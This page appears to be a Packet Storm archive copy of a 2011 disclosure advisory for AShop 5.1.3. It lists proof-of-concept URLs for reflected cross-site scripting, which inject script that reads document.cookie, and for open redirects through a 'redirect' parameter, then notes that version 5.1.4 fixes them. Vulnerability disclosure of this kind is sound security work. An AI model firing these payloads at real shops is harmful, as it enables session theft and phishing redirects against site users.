exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

AShop 5.1.3 Cross Site Scripting / Open Redirect

AShop 5.1.3 Cross Site Scripting / Open Redirect
Posted Nov 9, 2011
Authored by Stefan Schurtz

AShop version 5.1.3 suffers from cross site scripting and open redirect vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 0ab892b748573621ed77cdb1dec10b686d9a041f8d2e674dfe081fea2f6dcdf1

AShop 5.1.3 Cross Site Scripting / Open Redirect

Change Mirror Download
Advisory:    Multiple security vulnerabilities in AShop 5.1.3
Advisory ID: INFOSERVE-ADV2011-02
Author: Stefan Schurtz
Contact: security@infoserve.de
Affected Software: Successfully tested on AShop513
Vendor URL: http://www.ashopsoftware.com/
Vendor Status: fixed in Version 5.1.4

==========================
Vulnerability Description:
==========================

AShop is prone to multiple security vulnerabilities.

==================
PoC-Exploit
==================

Cross-Site-Scripting

IE8

http://<target>/ashop/?'"<script>alert(document.cookie)</script>
http://<target>/ashop/index.php?'"<script>alert(document.cookie)</script>
http://<target>/ashop/picture.php?picture="
stYle=x:expre/**/ssion(alert(document.cookie)) ns="
http://<target>/ashop/index.php?language='"<script>alert(document.cookie)</s
cript>

FF 7.1

http://<target>/ashop/index.php?searchstring=1&showresult=true&exp='"</scrip
t><script>alert(666);</script>&resultpage=&categories=off&msg=&search=index.
php&shop=1
http://<target>/ashop/catalogue.php?cat=3&exp=3&shop=3&resultpage='"</script
><script>alert(document.cookie)</script>&msg=
http://<target>/ashop/catalogue.php?cat=3&exp=3&shop=3&resultpage=1&msg='"</
script><script>alert(document.cookie)</script>
http://<target>/ashop/basket.php?cat=0&sid='"</script><script>alert(document
.cookie)</script>&shop=1&payoption=3

Open Redirection

http://<target>/ashop/language.php?language=sv&redirect=http://www.google.co
m
http://<target>/ashop/currency.php?currency=aud&redirect=http://www.google.c
om
http://<target>/ashop/currency.php?redirect=http://www.google.com

=========
Solution:
=========

Upgrade to the latest Version 5.1.4

====================
Disclosure Timeline:
====================

04-Nov-2011 - informed vendor by contact form
08-Nov-2011 - second contact attempt
09-Nov-2011 - vendor fix

========
Credits:
========

Vulnerabilities found and advisory written by the INFOSERVE Security Team

===========
References:
===========

http://www.ashopsoftware.com/
http://sourceforge.net/projects/ashop/files/

Best regards,
Stefan Schurtz | SECURE INFRASTRUCTURE

INFOSERVE GmbH | Am Felsbrunnen 15 | D-66119 Saarbrücken
Fon +49 (0)681 88008-52 | Fax +49 (0)681 88008-33 |
s.schurtz@infoserve.de | www.infoserve.de

Handelsregister: Amtsgericht Saarbrücken, HRB 11001 | Erfüllungsort:
Saarbrücken
Geschäftsführer: Dr. Stefan Leinenbach | Ust-IdNr.: DE168970599
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close